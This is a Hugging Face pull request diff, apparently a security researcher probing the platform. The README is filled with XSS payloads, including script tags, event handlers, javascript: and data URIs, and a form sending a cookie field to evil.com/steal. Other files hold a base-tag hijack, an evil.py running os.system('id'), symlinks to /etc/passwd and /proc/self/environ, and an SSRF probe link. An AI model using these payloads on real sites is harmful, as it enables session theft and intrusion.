Hugging Face's logo

FIRSTACCOUNT69
/
public-test-hunt

Eval Results
Model card Files
xet
Community
23

PR test from non-collaborator

#11
by SECONDACCOUNT69 - opened
base: refs/heads/main
from: refs/pr/11
Discussion Files changed
+66
-7
Files changed (14) hide show
  1. README.md +51 -3
  2. crlf-test.txt +1 -0
  3. env-link +0 -1
  4. evil.py +2 -0
  5. passwd-link +0 -1
  6. test.html +1 -0
  7. test.svg +5 -0
  8. trigger-wh-s28.txt +0 -1
  9. trigger.txt +1 -1
  10. user-watch-test.txt +1 -0
  11. verify-cross-user.txt +1 -0
  12. webhook-test.txt +1 -0
  13. webhook-trigger-v2.txt +1 -0
  14. xss.svg +1 -0
README.md CHANGED
@@ -1,5 +1,53 @@
1
- # Test Model
 
 
2
 
3
- ![image](https://firstaccount69-ssrf-probe.hf.space/log?modelcard-ssrf)
4
 
5
- Some model description.
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ license: mit
3
+ ---
4
 
5
+ # Test Model Card
6
 
7
+ ## Normal content
8
+ This is a test model.
9
+
10
+ ## HTML Tests
11
+
12
+ <!-- Basic script -->
13
+ <script>alert('xss1')</script>
14
+
15
+ <!-- Event handlers -->
16
+ <img src=x onerror=alert('xss2')>
17
+ <svg onload=alert('xss3')>
18
+ <body onload=alert('xss4')>
19
+ <input onfocus=alert('xss5') autofocus>
20
+ <marquee onstart=alert('xss6')>test</marquee>
21
+ <details open ontoggle=alert('xss7')>test</details>
22
+
23
+ <!-- iframe -->
24
+ <iframe src="javascript:alert('xss8')"></iframe>
25
+ <iframe src="https://evil.com"></iframe>
26
+
27
+ <!-- CSS injection -->
28
+ <style>body{background:url('https://evil.com/css-xss')}</style>
29
+
30
+ <!-- Link with javascript -->
31
+ [click me](javascript:alert('xss9'))
32
+
33
+ <!-- Data URI -->
34
+ <a href="data:text/html,<script>alert('xss10')</script>">data link</a>
35
+
36
+ <!-- SVG -->
37
+ <svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'><script>alert('xss11')</script></svg>#x"></use></svg>
38
+
39
+ <!-- Meta refresh -->
40
+ <meta http-equiv="refresh" content="0;url=https://evil.com">
41
+
42
+ <!-- Object/Embed -->
43
+ <object data="javascript:alert('xss12')">
44
+ <embed src="javascript:alert('xss13')">
45
+
46
+ <!-- Form -->
47
+ <form action="https://evil.com/steal"><input type="hidden" name="cookie" value="test"><button>Submit</button></form>
48
+
49
+ <!-- Base tag hijack -->
50
+ <base href="https://evil.com/">
51
+
52
+ ## Image tests
53
+ ![test](https://evil.com/image-load-tracking.png)
crlf-test.txt ADDED
@@ -0,0 +1 @@
 
 
1
+ test
env-link DELETED
@@ -1 +0,0 @@
1
- /proc/self/environ
 
 
evil.py ADDED
@@ -0,0 +1,2 @@
 
 
 
1
+ import os
2
+ os.system("id")
passwd-link DELETED
@@ -1 +0,0 @@
1
- /etc/passwd
 
 
test.html ADDED
@@ -0,0 +1 @@
 
 
1
+ <html><body><script>alert(document.domain)</script></body></html>
test.svg ADDED
trigger-wh-s28.txt DELETED
@@ -1 +0,0 @@
1
- trigger
 
 
trigger.txt CHANGED
@@ -1 +1 @@
1
- trigger webhook
 
1
+ webhook trigger test
user-watch-test.txt ADDED
@@ -0,0 +1 @@
 
 
1
+ test
verify-cross-user.txt ADDED
@@ -0,0 +1 @@
 
 
1
+ Testing which webhooks fire
webhook-test.txt ADDED
@@ -0,0 +1 @@
 
 
1
+ Testing if cross-user webhook fires
webhook-trigger-v2.txt ADDED
@@ -0,0 +1 @@
 
 
1
+ triggered at 1771375639
xss.svg ADDED